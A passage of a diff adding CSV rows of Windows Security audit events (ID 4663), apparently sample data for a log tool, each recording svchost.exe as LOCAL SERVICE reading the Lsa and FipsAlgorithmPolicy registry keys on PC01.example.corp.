+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452848</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452847</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452846</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452845</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452844</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452843</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452842</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452841</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452840</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452839</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452838</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452837</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452836</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452835</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452834</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452833</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
